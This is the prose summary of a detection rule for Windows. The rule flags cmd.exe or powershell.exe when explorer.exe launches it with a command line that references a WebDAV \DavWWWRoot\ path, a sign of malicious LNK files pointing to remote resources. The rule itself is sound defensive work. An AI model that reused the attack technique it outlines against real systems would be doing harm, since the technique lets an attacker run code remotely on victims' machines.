
Summary
The rule "Potentially Suspicious WebDAV LNK Execution" aims to detect potentially malicious activity involving the execution of applications triggered by LNK (link) files accessed through a WebDAV server. This type of attack can exploit the mechanism by which Windows executes link files that point to remote resources. The detection logic is specifically designed to identify process creation events where the parent process is Explorer and the child process is an executable that may be triggered by a WebDAV-accessed link file. The rule looks for a specific sequence: the parent image must end with \explorer.exe, the invoked image should be a common scripting or command execution utility (such as cmd.exe or powershell.exe), and the command line used must reference the WebDAV path structure \DavWWWRoot\. If all these conditions are met, the rule flags the event as potentially suspicious. This aids in identifying an attack vector that may be overlooked in traditional monitoring setups, as legitimate usage of LNK files may often go unchecked, leaving systems vulnerable.
Categories
- Windows
Data Sources
- File
- Process
Created: 2023-08-21